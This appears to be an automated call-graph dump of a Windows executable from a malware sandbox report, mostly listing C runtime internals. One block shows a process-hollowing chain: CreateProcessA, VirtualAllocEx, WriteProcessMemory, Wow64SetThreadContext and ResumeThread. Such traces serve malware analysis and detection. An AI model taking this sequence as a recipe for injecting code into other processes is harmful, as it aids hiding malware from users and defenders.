18582->18614 18584 abb9d2 18584->18565 18586 ac1af7 _Ungetc 42 API calls 18585->18586 18587 abb7b6 18586->18587 18588 ac1af7 _Ungetc 42 API calls 18587->18588 18595 abb7df 18587->18595 18589 abb7c4 18588->18589 18592 ac1af7 _Ungetc 42 API calls 18589->18592 18589->18595 18591 abb819 18596 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18591->18596 18593 abb7d2 18592->18593 18594 ac1af7 _Ungetc 42 API calls 18593->18594 18594->18595 18595->18591 18598 ac242d 18595->18598 18597 abb897 18596->18597 18597->18569 18599 ac2440 _Fputc 18598->18599 18604 ac22c3 18599->18604 18601 ac2455 18602 aba1cb _Fputc 42 API calls 18601->18602 18603 ac2462 18602->18603 18603->18591 18606 ac22d8 18604->18606 18605 ac2319 18608 ac22dc codecvt _Fputc 18605->18608 18610 ac5467 _Fputc WideCharToMultiByte 18605->18610 18613 ac2305 codecvt 18605->18613 18606->18605 18607 abadd0 _Fputc 42 API calls 18606->18607 18606->18608 18606->18613 18607->18605 18608->18601 18609 aba412 _Fputc 42 API calls 18609->18608 18611 ac23d4 18610->18611 18611->18608 18612 ac23ea GetLastError 18611->18612 18612->18608 18612->18613 18613->18608 18613->18609 18614->18584 18618 ab4122 18619 ab4129 18618->18619 18620 ab4175 18618->18620 18623 abb2d9 EnterCriticalSection 18619->18623 18622 ab412e 18623->18622 17383 ab1020 17388 ab3685 17383->17388 17385 ab1033 17386 ab5fe6 45 API calls 17385->17386 17387 ab103d 17386->17387 17389 ab3691 __EH_prolog3 17388->17389 17392 ab4644 17389->17392 17391 ab36e3 codecvt 17391->17385 17401 ab408a 17392->17401 17394 ab464f 17409 ab4cb8 17394->17409 17396 ab4662 17397 ab467c 17396->17397 17398 ab29b0 std::ios_base::_Init 43 API calls 17396->17398 17399 ab4688 17397->17399 17413 ab576c 17397->17413 17398->17397 17399->17391 17402 ab4096 __EH_prolog3 17401->17402 17403 ab29b0 std::ios_base::_Init 43 API calls 17402->17403 17404 ab40c7 17403->17404 17405 ab5a28 codecvt 3 API calls 17404->17405 17406 ab40ce 17405->17406 17408 ab40df codecvt 17406->17408 17418 ab5193 17406->17418 17408->17394 17410 ab4cc4 __EH_prolog3 17409->17410 17539 ab35c8 17410->17539 17412 ab4cdc std::ios_base::_Ios_base_dtor codecvt 17412->17396 17414 ab4f98 std::_Lockit::_Lockit 7 API calls 17413->17414 17415 ab577c 17414->17415 17416 ab4ff0 std::_Lockit::~_Lockit 2 API calls 17415->17416 17417 ab57ba 17416->17417 17417->17399 17419 ab519f __EH_prolog3 17418->17419 17430 ab4f98 17419->17430 17424 ab51bd 17442 ab5319 17424->17442 17425 ab5218 codecvt 17425->17408 17429 ab51db 17450 ab4ff0 17429->17450 17431 ab4fae 17430->17431 17432 ab4fa7 17430->17432 17435 ab4fac 17431->17435 17462 ab59ab EnterCriticalSection 17431->17462 17457 abcae4 17432->17457 17435->17429 17436 ab52f6 17435->17436 17437 ab5a28 codecvt 3 API calls 17436->17437 17438 ab5301 17437->17438 17439 ab5315 17438->17439 17511 ab5027 17438->17511 17439->17424 17443 ab51c5 17442->17443 17444 ab5325 17442->17444 17446 ab50eb 17443->17446 17514 ab5914 17444->17514 17447 ab50f9 17446->17447 17449 ab5105 ___std_exception_copy codecvt 17446->17449 17448 abc9fc ~ctype 14 API calls 17447->17448 17447->17449 17448->17449 17449->17429 17451 ab4ffa 17450->17451 17452 abcaf2 17450->17452 17453 ab500d 17451->17453 17537 ab59b9 LeaveCriticalSection 17451->17537 17538 abcacd LeaveCriticalSection 17452->17538 17453->17425 17456 abcaf9 17456->17425 17463 ac12b4 17457->17463 17462->17435 17484 ac0bba 17463->17484 17472 ac0c22 std::_Lockit::_Lockit 5 API calls 17473 ac12cd 17472->17473 17496 ac0c3c 17473->17496 17483 ac12e6 17483->17483 17485 ac0da3 __purecall 5 API calls 17484->17485 17486 ac0bd0 17485->17486 17487 ac0bd4 17486->17487 17488 ac0da3 __purecall 5 API calls 17487->17488 17489 ac0bea 17488->17489 17490 ac0bee 17489->17490 17491 ac0da3 __purecall 5 API calls 17490->17491 17492 ac0c04 17491->17492 17493 ac0c08 17492->17493 17494 ac0da3 __purecall 5 API calls 17493->17494 17495 ac0c1e 17494->17495 17495->17472 17497 ac0da3 __purecall 5 API calls 17496->17497 17498 ac0c52 17497->17498 17499 ac0c56 17498->17499 17500 ac0da3 __purecall 5 API calls 17499->17500 17501 ac0c6c 17500->17501 17502 ac0c70 17501->17502 17503 ac0da3 __purecall 5 API calls 17502->17503 17504 ac0c86 17503->17504 17505 ac0ca4 17504->17505 17506 ac0da3 __purecall 5 API calls 17505->17506 17507 ac0cba 17506->17507 17508 ac0c8a 17507->17508 17509 ac0da3 __purecall 5 API calls 17508->17509 17510 ac0ca0 17509->17510 17510->17483 17512 ab50eb _Yarn 14 API calls 17511->17512 17513 ab5061 17512->17513 17513->17424 17515 abb171 17514->17515 17516 ab5924 EncodePointer 17514->17516 17517 ac1478 _unexpected 2 API calls 17515->17517 17516->17443 17518 abb176 17517->17518 17519 abb181 17518->17519 17520 ac14bd _unexpected 42 API calls 17518->17520 17521 abb18b IsProcessorFeaturePresent 17519->17521 17522 abb1aa 17519->17522 17520->17519 17523 abb197 17521->17523 17524 abe451 _unexpected 23 API calls 17522->17524 17525 aba293 _unexpected 8 API calls 17523->17525 17526 abb1b4 17524->17526 17525->17522 17527 ac0a6b _unexpected 14 API calls 17526->17527 17528 abb1dc 17527->17528 17529 ac0ac8 ___free_lconv_mon 14 API calls 17528->17529 17530 abb1e8 17529->17530 17531 ac0a6b _unexpected 14 API calls 17530->17531 17534 abb20e 17530->17534 17533 abb202 17531->17533 17532 ac10f0 __purecall 6 API calls 17532->17534 17535 ac0ac8 ___free_lconv_mon 14 API calls 17533->17535 17534->17532 17536 abb21a 17534->17536 17535->17534 17536->17443 17537->17453 17538->17456 17540 ab35d4 __EH_prolog3 17539->17540 17541 ab4f98 std::_Lockit::_Lockit 7 API calls 17540->17541 17542 ab35de 17541->17542 17555 ab3ac0 17542->17555 17544 ab35f5 17554 ab3608 17544->17554 17561 ab3f25 17544->17561 17545 ab4ff0 std::_Lockit::~_Lockit 2 API calls 17546 ab364f codecvt 17545->17546 17546->17412 17548 ab3618 17549 ab361f 17548->17549 17550 ab3657 17548->17550 17571 ab5161 17549->17571 17574 ab4198 17550->17574 17554->17545 17556 ab3acc 17555->17556 17557 ab3af0 17555->17557 17558 ab4f98 std::_Lockit::_Lockit 7 API calls 17556->17558 17557->17544 17559 ab3ad6 17558->17559 17560 ab4ff0 std::_Lockit::~_Lockit 2 API calls 17559->17560 17560->17557 17563 ab3f31 __EH_prolog3 17561->17563 17562 ab3f8c codecvt 17562->17548 17563->17562 17564 ab5a28 codecvt 3 API calls 17563->17564 17566 ab3f48 codecvt 17564->17566 17565 ab3f79 17565->17562 17597 ab39da 17565->17597 17566->17565 17580 ab37d5 17566->17580 17572 ab5a28 codecvt 3 API calls 17571->17572 17573 ab516c 17572->17573 17573->17554 17575 ab41a6 Concurrency::cancel_current_task 17574->17575 17576 ab687d CallUnexpected RaiseException 17575->17576 17577 ab41b4 17576->17577 17578 ab365c 17577->17578 17727 abb2ed LeaveCriticalSection 17577->17727 17581 ab37e1 __EH_prolog3 17580->17581 17582 ab4f98 std::_Lockit::_Lockit 7 API calls 17581->17582 17583 ab37ee 17582->17583 17584 ab3822 17583->17584 17585 ab3837 17583->17585 17614 ab5291 17584->17614 17623 ab326a 17585->17623 17589 ab382b codecvt 17723 ab52dc 17597->17723 17600 ab3a15 17601 ab3a28 17600->17601 17603 abc9fc ~ctype 14 API calls 17600->17603 17604 ab3a39 17601->17604 17605 abc9fc ~ctype 14 API calls 17601->17605 17602 abc9fc ~ctype 14 API calls 17602->17600 17603->17601 17606 ab3a4a 17604->17606 17607 abc9fc ~ctype 14 API calls 17604->17607 17605->17604 17608 abc9fc ~ctype 14 API calls 17606->17608 17611 ab3a5b 17606->17611 17607->17606 17608->17611 17609 abc9fc ~ctype 14 API calls 17612 ab3a6c 17609->17612 17610 ab4ff0 std::_Lockit::~_Lockit 2 API calls 17613 ab3a77 17610->17613 17611->17609 17611->17612 17612->17610 17613->17562 17628 abcd5b 17614->17628 17617 ab50eb _Yarn 14 API calls 17618 ab52b5 17617->17618 17619 ab52c5 17618->17619 17620 abcd5b std::_Locinfo::_Locinfo_dtor 70 API calls 17618->17620 17621 ab50eb _Yarn 14 API calls 17619->17621 17620->17619 17622 ab52d9 17621->17622 17622->17589 17667 ab31fe 17623->17667 17626 ab687d CallUnexpected RaiseException 17627 ab3289 17626->17627 17629 ac12b4 std::_Lockit::_Lockit 5 API calls 17628->17629 17630 abcd68 17629->17630 17633 abcb06 17630->17633 17634 abcb12 __FrameHandler3::FrameUnwindToState 17633->17634 17641 abca85 EnterCriticalSection 17634->17641 17636 abcb20 17642 abcb61 17636->17642 17641->17636 17643 abccc0 std::_Locinfo::_Locinfo_dtor 70 API calls 17642->17643 17644 abcb7c 17643->17644 17645 abcb2d 17644->17645 17646 ac0590 __Getctype 42 API calls 17644->17646 17664 abcb55 17645->17664 17647 abcb89 17646->17647 17648 ac4318 std::_Locinfo::_Locinfo_dtor 44 API calls 17647->17648 17649 abcbae 17648->17649 17650 abcbb5 17649->17650 17651 ac3c5d std::_Locinfo::_Locinfo_dtor 15 API calls 17649->17651 17650->17645 17653 aba4bc __Getctype 11 API calls 17650->17653 17652 abcbda 17651->17652 17652->17645 17655 ac4318 std::_Locinfo::_Locinfo_dtor 44 API calls 17652->17655 17654 abccbf 17653->17654 17656 abcbf6 17655->17656 17657 abcc18 17656->17657 17658 abcbfd 17656->17658 17660 ac0ac8 ___free_lconv_mon 14 API calls 17657->17660 17662 abcc43 17657->17662 17658->17650 17659 abcc0f 17658->17659 17660->17662 17662->17645 17665 abcacd std::_Lockit::~_Lockit LeaveCriticalSection 17664->17665 17666 ab529d 17665->17666 17666->17617 17668 ab1f70 std::invalid_argument::invalid_argument 42 API calls 17667->17668 17669 ab3210 17668->17669 17669->17626 17724 ab52e8 17723->17724 17725 ab3a06 17723->17725 17726 abcd5b std::_Locinfo::_Locinfo_dtor 70 API calls 17724->17726 17725->17600 17725->17602 17726->17725 17727->17578 18925 ac1901 18926 ac190d __FrameHandler3::FrameUnwindToState 18925->18926 18937 abca85 EnterCriticalSection 18926->18937 18928 ac1914 18938 ac6d72 18928->18938 18935 ac1851 2 API calls 18936 ac1932 18935->18936 18957 ac1958 18936->18957 18937->18928 18939 ac6d7e __FrameHandler3::FrameUnwindToState 18938->18939 18940 ac6da8 18939->18940 18941 ac6d87 18939->18941 18960 abca85 EnterCriticalSection 18940->18960 18942 abd381 __Wcrtomb 14 API calls 18941->18942 18944 ac6d8c 18942->18944 18945 aba48f __strnicoll 42 API calls 18944->18945 18946 ac1923 18945->18946 18946->18936 18951 ac179b GetStartupInfoW 18946->18951 18947 ac6de0 18968 ac6e07 18947->18968 18949 ac6db4 18949->18947 18961 ac6cc2 18949->18961 18952 ac17b8 18951->18952 18954 ac184c 18951->18954 18953 ac6d72 42 API calls 18952->18953 18952->18954 18955 ac17e0 18953->18955 18954->18935 18955->18954 18956 ac1810 GetFileType 18955->18956 18956->18955 18972 abcacd LeaveCriticalSection 18957->18972 18959 ac1943 18960->18949 18962 ac0a6b _unexpected 14 API calls 18961->18962 18964 ac6cd4 18962->18964 18963 ac6ce1 18965 ac0ac8 ___free_lconv_mon 14 API calls 18963->18965 18964->18963 18966 ac10f0 __purecall 6 API calls 18964->18966 18967 ac6d36 18965->18967 18966->18964 18967->18949 18971 abcacd LeaveCriticalSection 18968->18971 18970 ac6e0e 18970->18946 18971->18970 18972->18959 14526 149018d 14527 14901c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 14526->14527 14529 14903a2 WriteProcessMemory 14527->14529 14530 14903e7 14529->14530 14531 1490429 WriteProcessMemory Wow64SetThreadContext ResumeThread 14530->14531 14532 14903ec WriteProcessMemory 14530->14532 14532->14530 18039 ab4861 18040 ab4875 18039->18040 18046 ab48d0 18040->18046 18047 ab3db8 18040->18047 18043 ab48bd 18043->18046 18059 abbfe5 18043->18059 18050 ab3e24 18047->18050 18051 ab3dd3 18047->18051 18048 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18049 ab3e3c 18048->18049 18049->18043 18049->18046 18053 abc356 18049->18053 18050->18048 18051->18050 18052 abc658 70 API calls 18051->18052 18052->18050 18054 abc369 _Fputc 18053->18054 18073 abc0f5 18054->18073 18057 aba1cb _Fputc 42 API calls 18058 abc38b 18057->18058 18058->18043 18060 abbff0 18059->18060 18061 abc005 18059->18061 18062 abd381 __Wcrtomb 14 API calls 18060->18062 18063 abc00d 18061->18063 18064 abc022 18061->18064 18065 abbff5 18062->18065 18066 abd381 __Wcrtomb 14 API calls 18063->18066 18105 ac3892 18064->18105 18068 aba48f __strnicoll 42 API calls 18065->18068 18069 abc012 18066->18069 18071 abc000 18068->18071 18072 aba48f __strnicoll 42 API calls 18069->18072 18070 abc01d 18070->18046 18071->18046 18072->18070 18074 abc101 __FrameHandler3::FrameUnwindToState 18073->18074 18075 abc107 18074->18075 18077 abc13b 18074->18077 18076 aba412 _Fputc 42 API calls 18075->18076 18079 abc122 18076->18079 18084 abb2d9 EnterCriticalSection 18077->18084 18079->18057 18080 abc147 18085 abc26a 18080->18085 18082 abc15e 18094 abc187 18082->18094 18084->18080 18086 abc27d 18085->18086 18087 abc290 18085->18087 18086->18082 18097 abc191 18087->18097 18089 abc2b3 18090 abbd66 ___scrt_uninitialize_crt 67 API calls 18089->18090 18093 abc341 18089->18093 18091 abc2e1 18090->18091 18101 ac3b1a 18091->18101 18093->18082 18104 abb2ed LeaveCriticalSection 18094->18104 18096 abc18f 18096->18079 18098 abc1a2 18097->18098 18100 abc1fa 18097->18100 18099 ac3ada 44 API calls 18098->18099 18098->18100 18099->18100 18100->18089 18102 ac39f9 ___scrt_uninitialize_crt 44 API calls 18101->18102 18103 ac3b33 18102->18103 18103->18093 18104->18096 18106 ac38a6 _Fputc 18105->18106 18111 ac32a7 18106->18111 18109 aba1cb _Fputc 42 API calls 18110 ac38c0 18109->18110 18110->18070 18112 ac32b3 __FrameHandler3::FrameUnwindToState 18111->18112 18113 ac32dd 18112->18113 18114 ac32ba 18112->18114 18122 abb2d9 EnterCriticalSection 18113->18122 18115 aba412 _Fputc 42 API calls 18114->18115 18117 ac32d3 18115->18117 18117->18109 18118 ac32eb 18123 ac3336 18118->18123 18120 ac32fa 18136 ac332c 18120->18136 18122->18118 18124 ac336d 18123->18124 18125 ac3345 18123->18125 18126 ac1af7 _Ungetc 42 API calls 18124->18126 18127 aba412 _Fputc 42 API calls 18125->18127 18128 ac3376 18126->18128 18135 ac3360 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18127->18135 18139 ac3abc 18128->18139 18131 ac3420 18142 ac3696 18131->18142 18133 ac3437 18133->18135 18154 ac34d7 18133->18154 18135->18120 18161 abb2ed LeaveCriticalSection 18136->18161 18138 ac3334 18138->18117 18140 ac38d3 46 API calls 18139->18140 18141 ac3394 18140->18141 18141->18131 18141->18133 18141->18135 18143 ac36a5 ___scrt_uninitialize_crt 18142->18143 18144 ac1af7 _Ungetc 42 API calls 18143->18144 18145 ac36c1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18144->18145 18147 ac3abc 46 API calls 18145->18147 18153 ac36cd 18145->18153 18146 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18148 ac383f 18146->18148 18149 ac3721 18147->18149 18148->18135 18150 ac3753 ReadFile 18149->18150 18149->18153 18151 ac377a 18150->18151 18150->18153 18152 ac3abc 46 API calls 18151->18152 18152->18153 18153->18146 18155 ac1af7 _Ungetc 42 API calls 18154->18155 18156 ac34ea 18155->18156 18157 ac3abc 46 API calls 18156->18157 18160 ac3532 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18156->18160 18158 ac3585 18157->18158 18159 ac3abc 46 API calls 18158->18159 18158->18160 18159->18160 18160->18135 18161->18138 18200 ab4a4b 18201 ab4a89 18200->18201 18202 ab4a54 18200->18202 18202->18201 18205 abbe3d 18202->18205 18204 ab4a7c 18206 abbe4f 18205->18206 18210 abbe58 ___scrt_uninitialize_crt 18205->18210 18207 abbcc1 ___scrt_uninitialize_crt 71 API calls 18206->18207 18208 abbe55 18207->18208 18208->18204 18209 abbe69 18209->18204 18210->18209 18213 abbc61 18210->18213 18214 abbc6d __FrameHandler3::FrameUnwindToState 18213->18214 18221 abb2d9 EnterCriticalSection 18214->18221 18216 abbc7b 18217 abbdcf ___scrt_uninitialize_crt 71 API calls 18216->18217 18218 abbc8c 18217->18218 18222 abbcb5 18218->18222 18221->18216 18225 abb2ed LeaveCriticalSection 18222->18225 18224 abbc9e 18224->18204 18225->18224 14533 ab5b5c 14534 ab5b68 __FrameHandler3::FrameUnwindToState 14533->14534 14561 ab5e20 14534->14561 14536 ab5b6f 14537 ab5cc8 14536->14537 14546 ab5b99 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 14536->14546 14628 ab6549 IsProcessorFeaturePresent 14537->14628 14539 ab5ccf 14595 abe48d 14539->14595 14544 ab5bb8 14545 ab5c3a 14572 abe0cb 14545->14572 14546->14544 14546->14545 14548 ab5c32 14546->14548 14598 abe467 14548->14598 14550 ab5c3f 14576 ab3100 FreeConsole 14550->14576 14551 ab5c39 14551->14545 14556 ab5c64 14557 ab5c6d 14556->14557 14619 abe442 14556->14619 14622 ab5f91 14557->14622 14562 ab5e29 14561->14562 14635 ab602c IsProcessorFeaturePresent 14562->14635 14566 ab5e3a 14571 ab5e3e 14566->14571 14645 ac00a5 14566->14645 14569 ab5e55 14569->14536 14571->14536 14573 abe0d9 14572->14573 14574 abe0d4 14572->14574 14573->14550 14717 abde25 14574->14717 15392 ab5a28 14576->15392 14580 ab3137 14581 ab316c 14580->14581 14582 ab3141 14580->14582 15422 ab344b 14581->15422 14583 ab317b 14582->14583 14584 ab3148 GetCurrentThreadId 14582->14584 14588 ab344b std::_Throw_Cpp_error 43 API calls 14583->14588 14586 ab3182 14584->14586 14587 ab3155 14584->14587 14590 ab344b std::_Throw_Cpp_error 43 API calls 14586->14590 15416 ab3295 WaitForSingleObjectEx 14587->15416 14588->14586 14591 ab3161 14590->14591 14592 ab344b std::_Throw_Cpp_error 43 API calls 14591->14592 14593 ab3168 14591->14593 14594 ab3190 14592->14594 14617 ab6663 GetModuleHandleW 14593->14617 15626 abe275 14595->15626 14599 abaf3d __FrameHandler3::FrameUnwindToState 14598->14599 14600 abe47d __purecall 14598->14600 14601 ac0590 __Getctype 42 API calls 14599->14601 14600->14551 14602 abaf4e 14601->14602 14603 abb171 __purecall 42 API calls 14602->14603 14604 abaf78 __FrameHandler3::FrameUnwindToState 14603->14604 14605 abaf99 14604->14605 14606 abaf8c GetLastError ExitThread 14604->14606 14607 ac0590 __Getctype 42 API calls 14605->14607 14608 abaf9e 14607->14608 14609 ac1335 6 API calls 14608->14609 14610 abafa9 14609->14610 14611 abafb5 14610->14611 14612 ac1240 5 API calls 14610->14612 14613 abb158 17 API calls 14611->14613 14612->14611 14614 abafd7 14613->14614 15703 abd932 14614->15703 14618 ab5c60 14617->14618 14618->14539 14618->14556 14620 abe275 _unexpected 23 API calls 14619->14620 14621 abe44d 14620->14621 14621->14557 14623 ab5f9d 14622->14623 14624 ab5c76 14623->14624 15706 ac00b7 14623->15706 14624->14544 14626 ab5fab 14627 ab8dbd ___scrt_uninitialize_crt 7 API calls 14626->14627 14627->14624 14629 ab655f _unexpected codecvt 14628->14629 14630 ab660a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14629->14630 14631 ab664e _unexpected 14630->14631 14631->14539 14632 abe451 14633 abe275 _unexpected 23 API calls 14632->14633 14634 ab5cdd 14633->14634 14636 ab5e35 14635->14636 14637 ab8d9e 14636->14637 14654 ab9e77 14637->14654 14640 ab8da7 14640->14566 14642 ab8daf 14643 ab8dba 14642->14643 14668 ab9eb3 14642->14668 14643->14566 14708 ac92ab 14645->14708 14648 ab8dbd 14649 ab8dd0 14648->14649 14650 ab8dc6 14648->14650 14649->14571 14651 ab8f36 ___vcrt_uninitialize_ptd 6 API calls 14650->14651 14652 ab8dcb 14651->14652 14653 ab9eb3 ___vcrt_uninitialize_locks DeleteCriticalSection 14652->14653 14653->14649 14655 ab9e80 14654->14655 14657 ab9ea9 14655->14657 14658 ab8da3 14655->14658 14672 aba0bc 14655->14672 14659 ab9eb3 ___vcrt_uninitialize_locks DeleteCriticalSection 14657->14659 14658->14640 14660 ab8f03 14658->14660 14659->14658 14689 ab9fcd 14660->14689 14663 ab8f18 14663->14642 14666 ab8f33 14666->14642 14669 ab9edd 14668->14669 14670 ab9ebe 14668->14670 14669->14640 14671 ab9ec8 DeleteCriticalSection 14670->14671 14671->14669 14671->14671 14677 ab9ee2 14672->14677 14675 aba0f4 InitializeCriticalSectionAndSpinCount 14676 aba0df 14675->14676 14676->14655 14678 ab9eff 14677->14678 14681 ab9f03 14677->14681 14678->14675 14678->14676 14679 ab9f6b GetProcAddress 14679->14678 14681->14678 14681->14679 14682 ab9f5c 14681->14682 14684 ab9f82 LoadLibraryExW 14681->14684 14682->14679 14683 ab9f64 FreeLibrary 14682->14683 14683->14679 14685 ab9fc9 14684->14685 14686 ab9f99 GetLastError 14684->14686 14685->14681 14686->14685 14687 ab9fa4 ___vcrt_FlsSetValue 14686->14687 14687->14685 14688 ab9fba LoadLibraryExW 14687->14688 14688->14681 14690 ab9ee2 ___vcrt_FlsSetValue 5 API calls 14689->14690 14691 ab9fe7 14690->14691 14692 aba000 TlsAlloc 14691->14692 14693 ab8f0d 14691->14693 14693->14663 14694 aba07e 14693->14694 14695 ab9ee2 ___vcrt_FlsSetValue 5 API calls 14694->14695 14696 aba098 14695->14696 14697 aba0b3 TlsSetValue 14696->14697 14698 ab8f26 14696->14698 14697->14698 14698->14666 14699 ab8f36 14698->14699 14700 ab8f46 14699->14700 14701 ab8f40 14699->14701 14700->14663 14703 aba008 14701->14703 14704 ab9ee2 ___vcrt_FlsSetValue 5 API calls 14703->14704 14705 aba022 14704->14705 14706 aba03a TlsFree 14705->14706 14707 aba02e 14705->14707 14706->14707 14707->14700 14709 ac92bb 14708->14709 14710 ab5e47 14708->14710 14709->14710 14712 ac1851 14709->14712 14710->14569 14710->14648 14714 ac1858 14712->14714 14713 ac189b GetStdHandle 14713->14714 14714->14713 14715 ac18fd 14714->14715 14716 ac18ae GetFileType 14714->14716 14715->14709 14716->14714 14718 abde2e 14717->14718 14721 abde44 14717->14721 14718->14721 14723 abde51 14718->14723 14720 abde3b 14720->14721 14740 abdfbc 14720->14740 14721->14573 14724 abde5a 14723->14724 14725 abde5d 14723->14725 14724->14720 14748 ac6517 14725->14748 14730 abde7a 14781 abdeab 14730->14781 14731 abde6e 14775 ac0ac8 14731->14775 14736 ac0ac8 ___free_lconv_mon 14 API calls 14737 abde9e 14736->14737 14738 ac0ac8 ___free_lconv_mon 14 API calls 14737->14738 14739 abdea4 14738->14739 14739->14720 14741 abdfcb 14740->14741 14742 abe02d 14740->14742 14741->14742 14743 ac0a6b _unexpected 14 API calls 14741->14743 14744 abe031 14741->14744 14745 ac5467 WideCharToMultiByte _Fputc 14741->14745 14747 ac0ac8 ___free_lconv_mon 14 API calls 14741->14747 14742->14721 14743->14741 14746 ac0ac8 ___free_lconv_mon 14 API calls 14744->14746 14745->14741 14746->14742 14747->14741 14749 abde63 14748->14749 14750 ac6520 14748->14750 14754 ac689a GetEnvironmentStringsW 14749->14754 14803 ac064b 14750->14803 14755 ac68b2 14754->14755 14760 abde68 14754->14760 14756 ac5467 _Fputc WideCharToMultiByte 14755->14756 14757 ac68cf 14756->14757 14758 ac68d9 FreeEnvironmentStringsW 14757->14758 14759 ac68e4 14757->14759 14758->14760 14761 ac3c5d std::_Locinfo::_Locinfo_dtor 15 API calls 14759->14761 14760->14730 14760->14731 14762 ac68eb 14761->14762 14763 ac6904 14762->14763 14764 ac68f3 14762->14764 14765 ac5467 _Fputc WideCharToMultiByte 14763->14765 14766 ac0ac8 ___free_lconv_mon 14 API calls 14764->14766 14767 ac6914 14765->14767 14768 ac68f8 FreeEnvironmentStringsW 14766->14768 14769 ac691b 14767->14769 14770 ac6923 14767->14770 14768->14760 14771 ac0ac8 ___free_lconv_mon 14 API calls 14769->14771 14772 ac0ac8 ___free_lconv_mon 14 API calls 14770->14772 14773 ac6921 FreeEnvironmentStringsW 14771->14773 14772->14773 14773->14760 14776 ac0ad3 HeapFree 14775->14776 14780 abde74 14775->14780 14777 ac0ae8 GetLastError 14776->14777 14776->14780 14778 ac0af5 __dosmaperr 14777->14778 14779 abd381 __Wcrtomb 12 API calls 14778->14779 14779->14780 14780->14720 14782 abdec0 14781->14782 14783 ac0a6b _unexpected 14 API calls 14782->14783 14784 abdee7 14783->14784 14785 abdeef 14784->14785 14793 abdef9 14784->14793 14786 ac0ac8 ___free_lconv_mon 14 API calls 14785->14786 14802 abde81 14786->14802 14787 abdf56 14788 ac0ac8 ___free_lconv_mon 14 API calls 14787->14788 14788->14802 14789 ac0a6b _unexpected 14 API calls 14789->14793 14790 abdf65 15382 abdf8d 14790->15382 14793->14787 14793->14789 14793->14790 14796 abdf80 14793->14796 14798 ac0ac8 ___free_lconv_mon 14 API calls 14793->14798 15373 ac0146 14793->15373 14795 ac0ac8 ___free_lconv_mon 14 API calls 14797 abdf72 14795->14797 15388 aba4bc IsProcessorFeaturePresent 14796->15388 14800 ac0ac8 ___free_lconv_mon 14 API calls 14797->14800 14798->14793 14800->14802 14801 abdf8c 14802->14736 14804 ac065c 14803->14804 14805 ac0656 14803->14805 14825 ac0662 14804->14825 14856 ac1033 14804->14856 14851 ac0ff4 14805->14851 14812 ac0667 14828 ac6322 14812->14828 14814 ac068e 14816 ac1033 __Getctype 6 API calls 14814->14816 14815 ac06a3 14817 ac1033 __Getctype 6 API calls 14815->14817 14818 ac069a 14816->14818 14819 ac06af 14817->14819 14822 ac0ac8 ___free_lconv_mon 14 API calls 14818->14822 14820 ac06c2 14819->14820 14821 ac06b3 14819->14821 14870 ac03be 14820->14870 14823 ac1033 __Getctype 6 API calls 14821->14823 14822->14825 14823->14818 14825->14812 14875 abb171 14825->14875 15173 ac6477 14828->15173 14835 ac638c 15200 ac6572 14835->15200 14836 ac637e 14837 ac0ac8 ___free_lconv_mon 14 API calls 14836->14837 14839 ac6365 14837->14839 14839->14749 14841 ac63c4 14845 ac63df 14896 ac0da3 14851->14896 14854 ac1019 14854->14804 14855 ac102b TlsGetValue 14857 ac0da3 __purecall 5 API calls 14856->14857 14858 ac104f 14857->14858 14859 ac106d TlsSetValue 14858->14859 14860 ac0676 14858->14860 14860->14825 14861 ac0a6b 14860->14861 14862 ac0a78 14861->14862 14863 ac0ab8 14862->14863 14864 ac0aa3 HeapAlloc 14862->14864 14869 ac0a8c _unexpected 14862->14869 14914 abd381 14863->14914 14865 ac0ab6 14864->14865 14864->14869 14867 ac0686 14865->14867 14867->14814 14867->14815 14869->14863 14869->14864 14911 abd8a9 14869->14911 14951 ac0252 14870->14951 15053 ac1478 14875->15053 14878 abb181 14880 abb18b IsProcessorFeaturePresent 14878->14880 14881 abb1aa 14878->14881 14882 abb197 14880->14882 14883 abe451 _unexpected 23 API calls 14881->14883 15083 aba293 14882->15083 14884 abb1b4 14883->14884 14886 ac0a6b _unexpected 14 API calls 14884->14886 14887 abb1dc 14886->14887 14888 ac0ac8 ___free_lconv_mon 14 API calls 14887->14888 14889 abb1e8 14888->14889 14890 ac0a6b _unexpected 14 API calls 14889->14890 14893 abb20e 14889->14893 14892 abb202 14890->14892 14894 ac0ac8 ___free_lconv_mon 14 API calls 14892->14894 14895 abb21a 14893->14895 15089 ac10f0 14893->15089 14894->14893 14897 ac0dd1 14896->14897 14900 ac0dcd 14896->14900 14897->14900 14903 ac0cd8 14897->14903 14900->14854 14900->14855 14901 ac0deb GetProcAddress 14901->14900 14902 ac0dfb __purecall 14901->14902 14902->14900 14909 ac0ce9 ___vcrt_FlsSetValue 14903->14909 14904 ac0d7f 14904->14900 14904->14901 14905 ac0d07 LoadLibraryExW 14906 ac0d86 14905->14906 14907 ac0d22 GetLastError 14905->14907 14906->14904 14908 ac0d98 FreeLibrary 14906->14908 14907->14909 14908->14904 14909->14904 14909->14905 14910 ac0d55 LoadLibraryExW 14909->14910 14910->14906 14910->14909 14917 abd8d6 14911->14917 14928 ac06e1 GetLastError 14914->14928 14916 abd386 14916->14867 14918 abd8e2 __FrameHandler3::FrameUnwindToState 14917->14918 14923 abca85 EnterCriticalSection 14918->14923 14920 abd8ed 14924 abd929 14920->14924 14923->14920 14927 abcacd LeaveCriticalSection 14924->14927 14926 abd8b4 14926->14869 14927->14926 14929 ac06f7 14928->14929 14930 ac06fd 14928->14930 14932 ac0ff4 __Getctype 6 API calls 14929->14932 14931 ac1033 __Getctype 6 API calls 14930->14931 14934 ac0701 SetLastError 14930->14934 14933 ac0719 14931->14933 14932->14930 14933->14934 14936 ac0a6b _unexpected 12 API calls 14933->14936 14934->14916 14937 ac072e 14936->14937 14938 ac0736 14937->14938 14939 ac0747 14937->14939 14940 ac1033 __Getctype 6 API calls 14938->14940 14941 ac1033 __Getctype 6 API calls 14939->14941 14942 ac0744 14940->14942 14943 ac0753 14941->14943 14946 ac0ac8 ___free_lconv_mon 12 API calls 14942->14946 14944 ac076e 14943->14944 14945 ac0757 14943->14945 